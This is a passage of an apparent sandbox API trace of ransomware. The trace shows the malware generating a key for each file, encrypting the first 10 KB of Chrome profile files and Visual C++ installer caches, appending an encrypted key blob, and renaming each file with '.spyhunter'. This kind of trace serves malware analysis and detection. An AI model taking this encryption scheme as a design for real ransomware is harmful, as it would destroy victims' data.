lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x248f6bc*, lpNumberOfBytesWritten=0x248f67c*=0x4, lpOverlapped=0x0) returned 1 [0133.369] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f67c*=0x30, lpOverlapped=0x0) returned 1 [0133.369] CloseHandle (hObject=0x178) returned 1 [0133.369] GetProcessHeap () returned 0x2c0000 [0133.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.369] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.spyhunter") returned 116 [0133.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.spyhunter")) returned 1 [0133.370] GetProcessHeap () returned 0x2c0000 [0133.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.370] GetProcessHeap () returned 0x2c0000 [0133.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.370] GetProcessHeap () returned 0x2c0000 [0133.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a320 | out: hHeap=0x2c0000) returned 1 [0133.370] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6c0 | out: pbBuffer=0x248f6c0) returned 1 [0133.370] GetProcessHeap () returned 0x2c0000 [0133.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6b8*=0x30) returned 1 [0133.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.371] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0133.371] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0133.371] GetProcessHeap () returned 0x2c0000 [0133.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.371] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f67c*=0x2fe, lpOverlapped=0x0) returned 1 [0133.543] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.543] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f67c*=0x2fe, lpOverlapped=0x0) returned 1 [0133.543] GetProcessHeap () returned 0x2c0000 [0133.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.543] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.543] WriteFile (in: hFile=0x178, lpBuffer=0x248f6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x248f6bc*, lpNumberOfBytesWritten=0x248f67c*=0x4, lpOverlapped=0x0) returned 1 [0133.543] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f67c*=0x30, lpOverlapped=0x0) returned 1 [0133.543] CloseHandle (hObject=0x178) returned 1 [0133.543] GetProcessHeap () returned 0x2c0000 [0133.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0133.543] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.spyhunter") returned 91 [0133.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.spyhunter" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.spyhunter")) returned 1 [0133.544] GetProcessHeap () returned 0x2c0000 [0133.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0133.544] GetProcessHeap () returned 0x2c0000 [0133.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.544] GetProcessHeap () returned 0x2c0000 [0133.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cfb8 | out: hHeap=0x2c0000) returned 1 [0133.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6b8 | out: pbBuffer=0x248f6b8) returned 1 [0133.544] GetProcessHeap () returned 0x2c0000 [0133.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6b0*=0x30) returned 1 [0133.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0133.690] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0133.690] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0133.690] GetProcessHeap () returned 0x2c0000 [0133.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.690] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f674*=0x2800, lpOverlapped=0x0) returned 1 [0133.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.692] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f674*=0x2800, lpOverlapped=0x0) returned 1 [0133.692] GetProcessHeap () returned 0x2c0000 [0133.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.692] WriteFile (in: hFile=0x158, lpBuffer=0x248f6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x248f6b4*, lpNumberOfBytesWritten=0x248f674*=0x4, lpOverlapped=0x0) returned 1 [0133.692] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f674*=0x30, lpOverlapped=0x0) returned 1 [0133.693] CloseHandle (hObject=0x158) returned 1 [0133.693] GetProcessHeap () returned 0x2c0000 [0133.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.693] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter") returned 157 [0133.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.spyhunter")) returned 1 [0133.693] GetProcessHeap () returned 0x2c0000 [0133.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.694] GetProcessHeap () returned 0x2c0000 [0133.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.694] GetProcessHeap () returned 0x2c0000 [0133.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17c10 | out: hHeap=0x2c0000) returned 1 [0133.694] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6b8 | out: pbBuffer=0x248f6b8) returned 1 [0133.694] GetProcessHeap () returned 0x2c0000 [0133.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6b0*=0x30) returned 1 [0133.694] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.729] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0133.729] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0133.729] GetProcessHeap () returned 0x2c0000 [0133.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.729] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f674*=0x2800, lpOverlapped=0x0) returned 1 [0133.875] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.875] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f674*=0x2800, lpOverlapped=0x0) returned 1 [0133.875] GetProcessHeap () returned 0x2c0000 [0133.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.875] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.875] WriteFile (in: hFile=0xec, lpBuffer=0x248f6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x248f6b4*, lpNumberOfBytesWritten=0x248f674*=0x4, lpOverlapped=0x0) returned 1 [0133.908] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f674*=0x30, lpOverlapped=0x0) returned 1 [0133.908] CloseHandle (hObject=0xec) returned 1 [0133.908] GetProcessHeap () returned 0x2c0000 [0133.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.908] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter") returned 137 [0133.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.spyhunter")) returned 1 [0133.909] GetProcessHeap () returned 0x2c0000 [0133.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.909] GetProcessHeap () returned 0x2c0000 [0133.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.909] GetProcessHeap () returned 0x2c0000 [0133.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05f10 | out: hHeap=0x2c0000) returned 1 [0133.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6b0 | out: pbBuffer=0x248f6b0) returned 1 [0133.909] GetProcessHeap () returned 0x2c0000 [0133.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6a8*=0x30) returned 1 [0133.910] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.142] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0134.142] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0134.142] GetProcessHeap () returned 0x2c0000 [0134.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.142] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f66c*=0x2800, lpOverlapped=0x0) returned 1 [0134.328] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.328] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f66c*=0x2800, lpOverlapped=0x0) returned 1 [0134.328] GetProcessHeap () returned 0x2c0000 [0134.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.328] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.328] WriteFile (in: hFile=0x17c, lpBuffer=0x248f6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f66c, lpOverlapped=0x0 | out: lpBuffer=0x248f6ac*, lpNumberOfBytesWritten=0x248f66c*=0x4, lpOverlapped=0x0) returned 1 [0134.328] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f66c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f66c*=0x30, lpOverlapped=0x0) returned 1 [0134.328] CloseHandle (hObject=0x17c) returned 1 [0134.329] GetProcessHeap () returned 0x2c0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.329] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter") returned 150 [0134.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.spyhunter")) returned 1 [0134.329] GetProcessHeap () returned 0x2c0000 [0134.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.329] GetProcessHeap () returned 0x2c0000 [0134.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.330] GetProcessHeap () returned 0x2c0000 [0134.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17958 | out: hHeap=0x2c0000) returned 1 [0134.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6a8 | out: pbBuffer=0x248f6a8) returned 1 [0134.337] GetProcessHeap () returned 0x2c0000 [0134.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6a0*=0x30) returned 1 [0134.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.338] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0134.338] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.338] GetProcessHeap () returned 0x2c0000 [0134.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.338] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f664*=0xce, lpOverlapped=0x0) returned 1 [0134.339] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.339] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x248f664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f664*=0xce, lpOverlapped=0x0) returned 1 [0134.339] GetProcessHeap () returned 0x2c0000 [0134.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.339] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.339] WriteFile (in: hFile=0x17c, lpBuffer=0x248f6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f664, lpOverlapped=0x0 | out: lpBuffer=0x248f6a4*, lpNumberOfBytesWritten=0x248f664*=0x4, lpOverlapped=0x0) returned 1 [0134.339] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f664, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f664*=0x30, lpOverlapped=0x0) returned 1 [0134.339] CloseHandle (hObject=0x17c) returned 1 [0134.339] GetProcessHeap () returned 0x2c0000 [0134.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.340] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 168 [0134.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0134.340] GetProcessHeap () returned 0x2c0000 [0134.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.340] GetProcessHeap () returned 0x2c0000 [0134.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.340] GetProcessHeap () returned 0x2c0000 [0134.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0134.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6a0 | out: pbBuffer=0x248f6a0) returned 1 [0134.342] GetProcessHeap () returned 0x2c0000 [0134.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f698*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f698*=0x30) returned 1 [0134.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 